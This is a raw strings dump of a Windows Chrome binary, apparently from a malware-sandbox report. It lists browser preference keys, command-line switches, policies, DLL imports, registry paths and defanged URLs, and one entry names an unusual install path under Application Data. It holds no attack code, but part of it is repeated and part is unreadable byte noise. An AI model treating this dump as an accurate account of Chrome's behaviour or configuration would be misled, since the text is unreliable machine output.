profile.managed_popups_blocked_for_urls
profile.managed_notifications_allowed_for_urls
profile.managed_notifications_blocked_for_urls
profile.managed_auto_select_certificate_for_urls
background_mode.enabled
hardware_acceleration_mode.enabled
custom_handlers.registered_protocol_handlers
custom_handlers.ignored_protocol_handlers
custom_handlers.enabled
policy.device_refresh_rate
policy.user_refresh_rate
recovery_component.version
component_updater.state
media_galleries.gallery_id
media_galleries.remembered_galleries
network_profile.warnings_left
network_profile.last_warning_time
policy.last_statistics_update
app_list.profile
app_list.show_on_relaunch
app_list.launch_count
app_list.last_launch_ping
app_list.app_launch_count
app_list.last_app_launch_ping
module_conflict.bubble_shown
settings.privacy.drm_salt
settings.privacy.drm_enabled
nacl-loader-cmd-prefix
allow-webui-compositing
disable-webgl
blacklist-webgl
disable-image-transport-surface
speech-service-key
disable-webaudio
enable-webrtc-aec-recordings
enable-webrtc-tcp-server-socket
enable-webrtc-hw-decoding
enable-web-animations-css
enable-web-animations-svg
enable-web-midi
disable-web-security
enable-experimental-websocket
enable-experimental-web-platform-features
disable-webkit-media-source
enable-privileged-webgl-extensions
enable-tcp-fastopen
enable-viewport
ignore-certificate-errors
remote-debugging-port
renderer-cmd-prefix
enable-vtune-support
testing-fixed-http-port
testing-fixed-https-port
utility-cmd-prefix
webcore-log-channels
zygote-cmd-prefix
enable-webgl-draft-extensions
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
GetProcessWindowStation
operator
SHELL32.dll
ole32.dll
OLEAUT32.dll
user.js
full-memory-crash-report
CHROME_PROFILER_TIME
%s-%Iu
ERROR_REPORT
metro_driver.dll
user32.dll
GetInitialUrl
PlatformFile.UnknownErrors.Windows
0123456789
Dictionary keys must be quoted.
Unsupported encoding. JSON must be UTF-8.
.thunks
.syzygy
Histogram: %s recorded %d samples
(flags = 0x%x)
\uX
Line: %i, column: %i, %s
(%d = %3.1f%%)
C:\b\build\slave\win\build\src\build\Release\chrome.exe.pdb
ShellExecuteExA
SHLWAPI.dll
KERNEL32.dll
USER32.dll
USERENV.dll
WTSAPI32.dll
VERSION.dll
WINMM.dll
GetWindowsDirectoryW
CreateIoCompletionPort
WaitNamedPipeW
TransactNamedPipe
SetNamedPipeHandleState
GetProcessHandleCount
GetProcessHeap
GetCPInfo
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
CloseWindowStation
CreateWindowStationW
SetProcessWindowStation
chrome.exe
SetActiveURL
SetCrashKeyValuePair
zcÁ
#$(   ....6/6////. )
2(  ..////6//6
( /.///6////
(//.//6///.`
  55;;/?
  55;;>;>/
)^%x>
@DQSSSSSQLLHHGG?332200--'
BDRSSSSQLLPHH??332000-7.
6%%%%#%###!!
122200.- *('%
35955220.- ('$
79::995420.-*(&
<<=;;23.
|(==7:89?
ÞDDDCA)
K%8xHQ
R.RKi)
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS>
9;:)<0<<<
5!5'5 50575
> >$>(>,>0>4>
< <$<(<,<
0#3'3 3/33373;3?3
: :$:(:,:0:
= =$=(=,=0=
>$><>@>`>|>
\\.\pipe\GoogleCrashServices\
\\.\pipe\ChromeCrashServices
ntdll.dll
error %u
unspecified-crash-key
hurl-chunk-%i
prn-info-%d
registering_chrome
echrmstp.exe
app_host.exe
chrome.dll
chrome_child.dll
npchrome_frame.dll
chrome_frame_helper.exe
ChromeFrameHelperWindowClass
ChromeFrameReadyMode
chrome_launcher.exe
new_chrome.exe
old_chrome.exe
delegate_execute.exe
nacl64.exe
setup.exe
InstallerSuccessLaunchCmdLine
{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}
{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}
Browse the web
Software\Microsoft\Windows\CurrentVersion\Uninstall\Chromium
{8A69D345-D564-463C-AFF1-A69D9E530F96}
{430FD4D0-B729-4F61-AA34-91526481799D}
GoogleUpdateSetup.exe
CFEndTempOptOutCmd
CFOptInCmd
CFOptOutCmd
CFTempOptOutCmd
UninstallCmdLine
WebAccessible
{4ea16ac7-fd5a-47c3-875b-dbf4a2008c20}
ChromeCanary
BGoogle Chrome Canary
-chrome
-chromeframe
{8A69D345-D564-463c-AFF1-A69D9E530F96}
{5C65F4B0-3651-4514-B207-D10CB699B14B}
hXXp://VVV.google.com/support/chrome/bin/request.py?hl=$1&contact_type=uninstall
BGoogle Chrome
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
%d.%d.%d
{8BA986DA-5100-405E-AA35-86F34A02ACBF}
BGoogle Chrome Frame
Google\Chrome Frame
Chrome in a Frame.
Uninstall Chrome Frame
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome Frame
{FDA71E6F-AC4C-4a00-8B70-9958A68906BF}
BGoogle Chrome App Launcher
ChromeAppList
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome App Launcher
{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}
Google Chrome binaries
%s\%s.dmp
rpcrt4.dll
dbghelp.dll
x-x-x-xx-xxxxxx
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_NLSTEXT
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
pipe\
Ckernel32.dll
ALPC Port
s0x%X
Cntdll.dll
wow_helper.exe"
GSOFTWARE\Policies\Google\Chrome
${windows}
Chrome_StatusTrayWindow
Reported Crashes.txt
testing_interface.dll
Certificate Revocation Lists
Custom Dictionary.txt
Login Data
Origin Bound Certs
Cached Theme.pak
Web Applications
pepflashplayer.dll
Software\Google\Chrome\Metro
CHROME_METRO_NAV_SEARCH_REQUEST
CHROME_METRO_GET_CURRENT_TAB_INFO
mscoree.dll
ADVAPI32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
nKERNEL32.DLL
WUSER32.DLL
DelegateExecute
\.exe
URL Protocol
webcal
https
.webp
.xhtml
.shtml
.html
Chrome HTML Document
ChromeHTML
Software\Microsoft\Windows\CurrentVersion\App Paths
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
gChrome_MessagePumpWindow_%p
HChrome_MessageWindow
Software\Classes\CLSID\{054AAE20-4BEA-4347-8A35-64A533254A9D}\LocalServer32
Software\Microsoft\Windows\CurrentVersion\Run
\StringFileInfo\xx\%ls
debug.log
.\debug.log
debug_message.exe
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\chrome.exe
Google Chrome
30.0.1573.2
chrome_exe

chrome.exe_336:

.text
`.rdata
@.data
.rsrc
@.reloc
SSShx
xSSSh
FTPjKS
FtPj;S
C.PjRV
0.0.0.0-devel
Chrome
ChromeFrame
CHROME_METRO_DLL
Could not find exported function
app\client_util.cc
RelaunchChromeBrowserWithNewCommandLineIfNeeded
Failed to load Chrome DLL from
No valid Chrome version found
ChromeMain
NTDLL.DLL
CHROME_BREAKPAD_PIPE_NAME
1.3.21.115
app\breakpad_win.cc
subresource_url
rsesek_key
hXXp://VVV.google.com/search?q=%s&sourceid=chrome&ie=UTF-8
browser\chrome_process_finder_win.cc
installer\util\google_update_settings.cc
Removed multi-install failure key; switching to channel:
Removed incremental installer failure key; switching to channel:
Failed to write to application's ClientState key
auto-launch-chrome
chrome
chrome-frame
chrome-sxs
do-not-launch-chrome
make-chrome-default
new-setup-exe
register-chrome-browser
register-chrome-browser-suffix
register-dev-chrome
register-url-protocol
rename-chrome-exe
remove-chrome-registration
update-setup-exe
toast-results-key
installer\util\channel_info.cc
Skipping over key "
Failed to open key "
Cannot initialize AppCommands from an invalid key.
installer\util\app_commands.cc
googlechrome
iexplore.exe
googlechromeframe
googlechromeapphost
installer\util\master_preferences.cc
Cannot initialize an AppCommand from an invalid key.
installer\util\app_command.cc
installer\util\language_selector.cc
auto_launch_chrome
chrome_frame
chrome_shortcut_icon_index
import_bookmarks
import_bookmarks_from_file
import_history
import_home_page
import_search_engine
do_not_launch_chrome
make_chrome_default
make_chrome_default_for_user
extensions.settings
kernel32.dll
NtOpenKey
NtCreateKey
NtOpenKeyEx
CreateNamedPipeW
AudioCaptureAllowedUrls
AutoSelectCertificateForUrls
CloudPrintProxyEnabled
CloudPrintSubmitEnabled
ContentPackManualBehaviorURLs
CookiesAllowedForUrls
CookiesBlockedForUrls
CookiesSessionOnlyForUrls
DefaultSearchProviderAlternateURLs
DefaultSearchProviderIconURL
DefaultSearchProviderInstantURL
DefaultSearchProviderKeyword
DefaultSearchProviderSearchTermsReplacementKey
DefaultSearchProviderSearchURL
DefaultSearchProviderSuggestURL
EnableAuthNegotiatePort
EnableOriginBoundCerts
HideWebStoreIcon
ImagesAllowedForUrls
ImagesBlockedForUrls
ImportBookmarks
ImportHistory
ImportHomepage
ImportSavedPasswords
ImportSearchEngine
JavaScriptAllowedForUrls
JavaScriptBlockedForUrls
MetricsReportingEnabled
NotificationsAllowedForUrls
NotificationsBlockedForUrls
PasswordManagerAllowShowPasswords
PasswordManagerEnabled
PluginsAllowedForUrls
PluginsBlockedForUrls
PopupsAllowedForUrls
PopupsBlockedForUrls
ProxyBypassList
ProxyPacUrl
RemoteAccessHostDomain
RemoteAccessHostFirewallTraversal
RemoteAccessHostRequireCurtain
RemoteAccessHostRequireTwoFactor
RemoteAccessHostTalkGadgetPrefix
RestoreOnStartupURLs
URLBlacklist
URLWhitelist
VideoCaptureAllowedUrls
ChromeFrameContentTypes
ChromeFrameRendererSettings
ChromeOsLockOnIdleSuspend
ChromeOsReleaseChannel
ChromeOsReleaseChannelDelegated
DeviceAllowRedeemChromeOsRegistrationOffers
DeviceLocalAccountAutoLoginBailoutEnabled
DeviceLocalAccountAutoLoginDelay
DeviceLocalAccountAutoLoginId
DeviceLoginScreenDefaultHighContrastEnabled
DeviceLoginScreenDefaultLargeCursorEnabled
DeviceLoginScreenDefaultScreenMagnifierType
DeviceLoginScreenDefaultSpokenFeedbackEnabled
DeviceLoginScreenPowerManagement
DeviceLoginScreenSaverId
DeviceLoginScreenSaverTimeout
DeviceMetricsReportingEnabled
DeviceStartUpUrls
EnterpriseWebStoreName
EnterpriseWebStoreURL
HideWebStorePromo
RenderInChromeFrameList
ReportDeviceActivityTimes
ReportDeviceBootMode
ReportDeviceLocation
ReportDeviceNetworkInterfaces
ReportDeviceVersionInfo
SuppressChromeFrameTurndownPrompt
TermsOfServiceURL
CHROME_HEADLESS
CHROME_LOG_FILE
CHROMEOS_SESSION_LOG_DIR
CHROME_CRASHED
CHROME_RESTART
allow-http-background-page
allow-http-screen-capture
apps-checkout-url
apps-gallery-download-url
apps-gallery-url
apps-gallery-update-url
chrome-version
device-management-url
disable-extensions-http-throttling
disable-password-autofill-public-suffix-domain-matching
disable-sync-passwords
disable-sync-typed-urls
disable-web-resources
enable-auth-negotiate-port
enable-password-autofill-public-suffix-domain-matching
enable-autologin
enable-metrics-reporting-for-testing
enable-npn-http
enable-password-generation
enable-quic-https
enable-save-password-bubble
enable-user-controlled-alternate-protocol-ports
enable-websocket-over-spdy
explicitly-allowed-ports
google-base-url
google-search-domain-check-url
ignore-urlfetcher-cert-requests
install-from-webstore
limited-install-from-webstore
pack-extension-key
promo-server-url
proxy-bypass-list
proxy-pac-url
safebrowsing-url-prefix
safebrowsing-download-feedback-url
spelling-service-feedback-url
sync-invalidate-xmpp-login
sync-notification-host-port
sync-url
sync-try-ssltcp-first-for-xmpp
enable-syncfs-directory-operation
translate-script-url
try-chrome-again
variations-server-url
visit-urls
winhttp-proxy-resolver
plugins-metadata-server-url
windows8-search
CHROME_VERSION
>CHROME_PRE_READ_EXPERIMENT
chrome.googleechotest.com
hXXp://pipelining.googleechotest.com/
profile.managed.manual_hosts
profile.managed.manual_urls
profile.managed.custodian_email
profile.managed.custodian_name
profile.icon_version
profile.exited_cleanly
profile.exit_type
session.restore_on_startup
session.restore_on_startup_migrated
session.urls_to_restore_on_startup
intl.app_locale
intl.charset_default
intl.accept_languages
intl.static_encodings
intl.global.charset_default
webkit.webprefs.global.default_font_size
webkit.webprefs.global.default_fixed_font_size
webkit.webprefs.global.minimum_font_size
webkit.webprefs.global.minimum_logical_font_size
webkit.webprefs.global.javascript_enabled
webkit.webprefs.global.javascript_can_open_windows_automatically
webkit.webprefs.global.loads_images_automatically
webkit.webprefs.global.plugins_enabled
webkit.webprefs.global.standard_font_family
webkit.webprefs.global.fixed_font_family
webkit.webprefs.global.serif_font_family
webkit.webprefs.global.sansserif_font_family
webkit.webprefs.global.cursive_font_family
webkit.webprefs.global.fantasy_font_family
webkit.webprefs.standard_font_family
webkit.webprefs.fixed_font_family
webkit.webprefs.serif_font_family
webkit.webprefs.sansserif_font_family
webkit.webprefs.cursive_font_family
webkit.webprefs.fantasy_font_family
webkit.webprefs.fonts.standard
webkit.webprefs.fonts.fixed
webkit.webprefs.fonts.serif
webkit.webprefs.fonts.sansserif
webkit.webprefs.fonts.cursive
webkit.webprefs.fonts.fantasy
webkit.webprefs.fonts.pictograph
webkit.webprefs.fonts.standard.Arab
webkit.webprefs.fonts.fixed.Arab
webkit.webprefs.fonts.serif.Arab
webkit.webprefs.fonts.sansserif.Arab
webkit.webprefs.fonts.standard.Cyrl
webkit.webprefs.fonts.fixed.Cyrl
webkit.webprefs.fonts.serif.Cyrl
webkit.webprefs.fonts.sansserif.Cyrl
webkit.webprefs.fonts.standard.Grek
webkit.webprefs.fonts.fixed.Grek
webkit.webprefs.fonts.serif.Grek
webkit.webprefs.fonts.sansserif.Grek
webkit.webprefs.fonts.standard.Jpan
webkit.webprefs.fonts.fixed.Jpan
webkit.webprefs.fonts.serif.Jpan
webkit.webprefs.fonts.sansserif.Jpan
webkit.webprefs.fonts.standard.Hang
webkit.webprefs.fonts.fixed.Hang
webkit.webprefs.fonts.serif.Hang
webkit.webprefs.fonts.sansserif.Hang
webkit.webprefs.fonts.cursive.Hang
webkit.webprefs.fonts.standard.Hans
webkit.webprefs.fonts.fixed.Hans
webkit.webprefs.fonts.serif.Hans
webkit.webprefs.fonts.sansserif.Hans
webkit.webprefs.fonts.standard.Hant
webkit.webprefs.fonts.fixed.Hant
webkit.webprefs.fonts.serif.Hant
webkit.webprefs.fonts.sansserif.Hant
webkit.webprefs.web_security_enabled
webkit.webprefs.dom_paste_enabled
webkit.webprefs.shrinks_standalone_images_to_fit
webkit.webprefs.inspector_settings
webkit.webprefs.uses_universal_detector
webkit.webprefs.text_areas_are_resizable
webkit.webprefs.java_enabled
webkit.webprefs.tabs_to_links
webkit.webprefs.allow_displaying_insecure_content
webkit.webprefs.allow_running_insecure_content
webkit.webprefs.fonts.standard.Zyyy
webkit.webprefs.fonts.fixed.Zyyy
webkit.webprefs.fonts.serif.Zyyy
webkit.webprefs.fonts.sansserif.Zyyy
webkit.webprefs.fonts.cursive.Zyyy
webkit.webprefs.fonts.fantasy.Zyyy
webkit.webprefs.fonts.pictograph.Zyyy
webkit.webprefs.default_font_size
webkit.webprefs.default_fixed_font_size
webkit.webprefs.minimum_font_size
webkit.webprefs.minimum_logical_font_size
webkit.webprefs.javascript_enabled
webkit.webprefs.javascript_can_open_windows_automatically
webkit.webprefs.loads_images_automatically
webkit.webprefs.plugins_enabled
bookmark_bar.show_on_all_tabs
bookmark_bar.show_apps_shortcut
bookmark_editor.expanded_nodes
password_generation.enabled
profile.password_manager_enabled
profile.password_manager_allow_show_passwords
autologin.enabled
reverse_autologin.enabled
reverse_autologin.rejected_email_list
safebrowsing.enabled
safebrowsing.reporting_enabled
safebrowsing.proceed_anyway_disabled
incognito.mode_availability
search.suggest_enabled
browser.confirm_to_quit
security.cookie_behavior
default_search_provider.synced_guid
default_search_provider.enabled
default_search_provider.search_url
default_search_provider.suggest_url
default_search_provider.instant_url
default_search_provider.icon_url
default_search_provider.encodings
default_search_provider.name
default_search_provider.keyword
default_search_provider.id
default_search_provider.prepopulate_id
default_search_provider.alternate_urls
default_search_provider.search_terms_replacement_key
download.prompt_for_download
alternate_error_pages.enabled
dns_prefetching.startup_list
dns_prefetching.host_referral_list
spdy.disabled
net.http_server_properties
spdy.servers
spdy.alternate_protocol
protocol.disabled_schemes
policy.url_blacklist
policy.url_whitelist
instant_ui.zero_suggest_url_prefix
local_state.multiple_profile_prefs_version
dns_prefetching.enabled
hide_web_store_icon
browser.show_home_button
profile.recently_selected_encodings
browser.clear_data.browsing_history
browser.clear_data.download_history
browser.clear_data.cache
browser.clear_data.cookies
browser.clear_data.passwords
browser.clear_data.form_data
browser.clear_data.hosted_apps_data
browser.clear_data.content_licenses
browser.clear_data.time_period
browser.last_clear_browsing_data_time
browser.enable_spellchecking
browser.enabled_labs_experiments
browser.enable_autospellcorrect
browser.speechinput_censor_results
browser.speechinput_tray_notification_shown_contexts
history.saving_disabled
history.deleting_enabled
settings.force_safesearch
extensions.theme.pack
extensions.theme.id
extensions.theme.images
extensions.theme.colors
extensions.theme.tints
extensions.theme.properties
extensions.ui.developer_mode
extensions.toolbarsize
extensions.toolbar
extensions.commands
plugins.last_internal_directory
plugins.plugins_list
plugins.plugins_disabled
plugins.plugins_disabled_exceptions
plugins.plugins_enabled
plugins.migrated_to_pepper_flash
plugins.removed_old_component_pepper_flash_settings
plugins.show_details
plugins.allow_outdated
plugins.always_authorize
plugins.metadata
plugins.resource_cache_update
browser.check_default_browser
browser.suppress_switch_to_metro_mode_on_set_default
browser.default_browser_setting_enabled
browser.custom_chrome_frame
browser.desktop_notification_position
profile.default_content_settings
profile.content_settings.clear_on_exit_migrated
profile.content_settings.pref_version
profile.content_settings.pattern_pairs
profile.content_settings.whitelist_version
profile.content_settings.plugin_whitelist
profile.block_third_party_cookies
profile.clear_site_data_on_exit
profile.default_zoom_level
profile.per_host_zoom_levels
autofill.data_model_default
autofill.has_paid_with_wallet
autofill.pay_without_wallet
autofill.show_count
autofill.generated_card_bubble_times_shown
bookmarks.editing_enabled
translate.enabled
googlegeolocationaccess.enabled
media.default_audio_capture_device
media.default_video_capture_Device
import_saved_passwords
profile.avatar_index
profile.name
profile.is_managed
printing.enabled
printing.print_preview_disabled
profile.managed.default_filtering_behavior
profile.managed_user_creation_allowed
profile.managed_users
message_center.disabled_extension_ids
message_center.disabled_system_component_ids
message_center.enabled_sync_notifier_ids
profile.last_used
profile.last_active_profiles
profile.profiles_created
profile.created_by_version
profile.info_cache
ssl.rev_checking.enabled
ssl.version_min
ssl.version_max
ssl.cipher_suites.blacklist
ssl.origin_bound_certs.enabled
ssl.ssl_record_splitting.disabled
ssl.unrestricted_ssl3_fallback.enabled
user_experience_metrics.client_id
user_experience_metrics.session_id
user_experience_metrics.low_entropy_source
user_experience_metrics.permuted_entropy_cache
user_experience_metrics.client_id_timestamp
user_experience_metrics.reporting_enabled
user_experience_metrics.initial_logs_as_protobufs
user_experience_metrics.ongoing_logs_as_protobufs
user_experience_metrics.stability.exited_cleanly
user_experience_metrics.stability.stats_version
user_experience_metrics.stability.stats_buildtime
user_experience_metrics.stability.session_end_completed
user_experience_metrics.stability.launch_count
user_experience_metrics.stability.crash_count
user_experience_metrics.stability.incomplete_session_end_count
user_experience_metrics.stability.page_load_count
user_experience_metrics.stability.renderer_crash_count
user_experience_metrics.stability.launch_time_sec
user_experience_metrics.stability.extension_renderer_crash_count
user_experience_metrics.stability.last_timestamp_sec
user_experience_metrics.stability.plugin_stats2
user_experience_metrics.stability.renderer_hang_count
user_experience_metrics.stability.child_process_crash_count
user_experience_metrics.stability.other_user_crash_count
user_experience_metrics.stability.kernel_crash_count
user_experience_metrics.stability.system_unclean_shutdowns
user_experience_metrics.stability.breakpad_registration_ok
user_experience_metrics.stability.breakpad_registration_fail
user_experience_metrics.stability.debugger_present
user_experience_metrics.stability.debugger_not_present
uninstall_metrics.installation_date2
uninstall_metrics.page_load_count
uninstall_metrics.launch_count
uninstall_metrics.uptime_sec
uninstall_metrics.last_launch_time_sec
uninstall_metrics.last_observed_running_time_sec
browser.suppress_default_browser_prompt_for_version
browser.window_placement
task_manager.window_placement
keyword_editor.window_placement
preferences.window_placement
renderer.memory_cache.size
download.default_directory
download.directory_upgrade
savefile.default_directory
savefile.type
selectfile.last_directory
select_file_dialogs.allowed
filebrowser.tasks.default_by_mime_type
filebrowser.tasks.default_by_suffix
download.extensions_to_open
browser.hung_plugin_detect_freq
browser.plugin_message_response_timeout
spellcheck.dictionary
spellcheck.confirm_dialog_shown
spellcheck.use_spelling_service
protocol_handler.excluded_schemes
safe_browsing.client_key
safe_browsing.wrapped_key
options_window.last_tab_index
content_settings_window.last_tab_index
certificate_manager_window.last_tab_index
browser.last_known_google_url
browser.last_prompted_google_url
browser.last_redirect_origin
shutdown.type
shutdown.num_processes
shutdown.num_processes_slow
restart.last.session.on.shutdown
was.restarted
restart.switch_mode
extensions.disabled
plugins.disable_plugin_finder
extensions.browseractions.container.width
extensions.autoupdate.last_check
extensions.autoupdate.next_check
extensions.alerts.initialized
extensions.allowed_install_sites
extensions.allowed_types
extensions.blacklistupdate.version
extensions.install.allowlist
extensions.install.denylist
extensions.install.forcelist
extensions.storage.garbagecollect
ntp.collapsed_foreign_sessions
ntp.most_visited_blacklist
ntp.promo_resource_cache_update
ntp.tips_resource_server
ntp.date_resource_server
ntp.shown_bookmarks_folder
ntp.shown_page
ntp.promo_desktop_session_found
ntp.webstore_enabled
ntp.app_page_names
devtools.adb_key
devtools.disabled
devtools.dock_side
devtools.edited_files
devtools.file_system_paths
devtools.split_location
devtools.open_docked
signin.allowed
sync.last_synced_time
sync.has_setup_completed
sync.keep_everything_synced
sync.app_notifications
sync.app_settings
sync.apps
sync.autofill_profile
sync.autofill
sync.bookmarks
sync.dictionary
sync.extension_settings
sync.extensions
sync.favicon_images
sync.favicon_tracking
sync.history_delete_directives
sync.managed_user_settings
sync.managed_users
sync.passwords
sync.preferences
sync.priority_preferences
sync.search_engines
sync.sessions
sync.synced_notifications
sync.tabs
sync.themes
sync.typed_urls
sync.managed
sync.suppress_start
sync.acknowledged_types
sync.max_invalidation_versions
sync.session_sync_guid
invalidator.client_id
invalidator.invalidation_state
invalidator.max_invalidation_versions
sync.encryption_bootstrap_token
sync.keystore_encryption_bootstrap_token
sync.using_secondary_passphrase
google.services.last_username
google.services.username
google.services.username_pattern
sync_promo.startup_count
sync_promo.user_skipped
sync_promo.show_on_first_run_allowed
sync_promo.show_ntp_bubble
sync_promo.error_message
profile.gaia_info_update_time
profile.gaia_info_picture_url
browser.web_app.create_on_desktop
browser.web_app.create_in_apps_menu
browser.web_app.create_in_quick_launch_bar
geolocation.access_token
remote_access.host_firewall_traversal
remote_access.host_require_two_factor
remote_access.host_domain
remote_access.host_talkgadget_prefix
remote_access.host_require_curtain
printing.print_preview_sticky_settings
cloud_print.service_url
cloud_print.signin_url
cloud_print.dialog_size.width
cloud_print.dialog_size.height
cloud_print.signin_dialog_size.width
cloud_print.signin_dialog_size.height
background_contents.registered
browser.shown_autolaunch_infobar
auth.schemes
auth.disable_negotiate_cname_lookup
auth.enable_negotiate_port
auth.server_whitelist
auth.negotiate_delegate_whitelist
auth.gssapi_library_name
auth.spdyproxy.origin
auth.allow_cross_origin_prompt
async_dns.enabled
http_received_content_length
http_original_content_length
hardware.audio_capture_enabled
hardware.audio_capture_allowed_urls
hardware.video_capture_enabled
hardware.video_capture_allowed_urls
browser.clear_lso_data_enabled
browser.pepper_flash_settings_enabled
browser.disk_cache_dir
browser.disk_cache_size
browser.media_cache_size
cros.system.releaseChannel
policy.disable_cloud_policy_on_signin
message_center.showed_first_run_balloon
cloud_print.enabled
cloud_print.proxy_id
cloud_print.auth_token
cloud_print.xmpp_auth_token
cloud_print.email
cloud_print.print_system_settings
cloud_print.enable_job_poll
cloud_print.robot_refresh_token
cloud_print.robot_email
cloud_print.user_settings.connectNewPrinters
cloud_print.xmpp_ping_enabled
cloud_print.xmpp_ping_timeout_sec
cloud_print.user_settings
cloud_print.user_settings.printers
cloud_print.submit_enabled
net.max_connections_per_proxy
profile.managed_default_content_settings.cookies
profile.managed_default_content_settings.images
profile.managed_default_content_settings.javascript
profile.managed_default_content_settings.plugins
profile.managed_default_content_settings.popups
profile.managed_default_content_settings.geolocation
profile.managed_default_content_settings.notifications
profile.managed_default_content_settings.media_stream
profile.managed_cookies_allowed_for_urls
profile.managed_cookies_blocked_for_urls
profile.managed_cookies_sessiononly_for_urls
profile.managed_images_allowed_for_urls
profile.managed_images_blocked_for_urls
profile.managed_javascript_allowed_for_urls
profile.managed_javascript_blocked_for_urls
profile.managed_plugins_allowed_for_urls
profile.managed_plugins_blocked_for_urls
profile.managed_popups_allowed_for_urls
profile.managed_popups_blocked_for_urls
profile.managed_notifications_allowed_for_urls
profile.managed_notifications_blocked_for_urls
profile.managed_auto_select_certificate_for_urls
background_mode.enabled
hardware_acceleration_mode.enabled
custom_handlers.registered_protocol_handlers
custom_handlers.ignored_protocol_handlers
custom_handlers.enabled
policy.device_refresh_rate
policy.user_refresh_rate
recovery_component.version
component_updater.state
media_galleries.gallery_id
media_galleries.remembered_galleries
network_profile.warnings_left
network_profile.last_warning_time
policy.last_statistics_update
app_list.profile
app_list.show_on_relaunch
app_list.launch_count
app_list.last_launch_ping
app_list.app_launch_count
app_list.last_app_launch_ping
module_conflict.bubble_shown
settings.privacy.drm_salt
settings.privacy.drm_enabled
nacl-loader-cmd-prefix
allow-webui-compositing
disable-webgl
blacklist-webgl
disable-image-transport-surface
speech-service-key
disable-webaudio
enable-webrtc-aec-recordings
enable-webrtc-tcp-server-socket
enable-webrtc-hw-decoding
enable-web-animations-css
enable-web-animations-svg
enable-web-midi
disable-web-security
enable-experimental-websocket
enable-experimental-web-platform-features
disable-webkit-media-source
enable-privileged-webgl-extensions
enable-tcp-fastopen
enable-viewport
ignore-certificate-errors
remote-debugging-port
renderer-cmd-prefix
enable-vtune-support
testing-fixed-http-port
testing-fixed-https-port
utility-cmd-prefix
webcore-log-channels
zygote-cmd-prefix
enable-webgl-draft-extensions
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
GetProcessWindowStation
operator
SHELL32.dll
ole32.dll
OLEAUT32.dll
user.js
full-memory-crash-report
CHROME_PROFILER_TIME
%s-%Iu
ERROR_REPORT
metro_driver.dll
user32.dll
GetInitialUrl
PlatformFile.UnknownErrors.Windows
0123456789
Dictionary keys must be quoted.
Unsupported encoding. JSON must be UTF-8.
.thunks
.syzygy
Histogram: %s recorded %d samples
(flags = 0x%x)
\uX
Line: %i, column: %i, %s
(%d = %3.1f%%)
C:\b\build\slave\win\build\src\build\Release\chrome.exe.pdb
ShellExecuteExA
SHLWAPI.dll
KERNEL32.dll
USER32.dll
USERENV.dll
WTSAPI32.dll
VERSION.dll
WINMM.dll
GetWindowsDirectoryW
CreateIoCompletionPort
WaitNamedPipeW
TransactNamedPipe
SetNamedPipeHandleState
GetProcessHandleCount
GetProcessHeap
GetCPInfo
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
CloseWindowStation
CreateWindowStationW
SetProcessWindowStation
chrome.exe
SetActiveURL
SetCrashKeyValuePair
zcÁ
#$(   ....6/6////. )
2(  ..////6//6
( /.///6////
(//.//6///.`
  55;;/?
  55;;>;>/
)^%x>
@DQSSSSSQLLHHGG?332200--'
BDRSSSSQLLPHH??332000-7.
6%%%%#%###!!
122200.- *('%
35955220.- ('$
79::995420.-*(&
<<=;;23.
|(==7:89?
ÞDDDCA)
K%8xHQ
R.RKi)
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS>
9;:)<0<<<
5!5'5 50575
> >$>(>,>0>4>
< <$<(<,<
0#3'3 3/33373;3?3
: :$:(:,:0:
= =$=(=,=0=
>$><>@>`>|>
\\.\pipe\GoogleCrashServices\
\\.\pipe\ChromeCrashServices
ntdll.dll
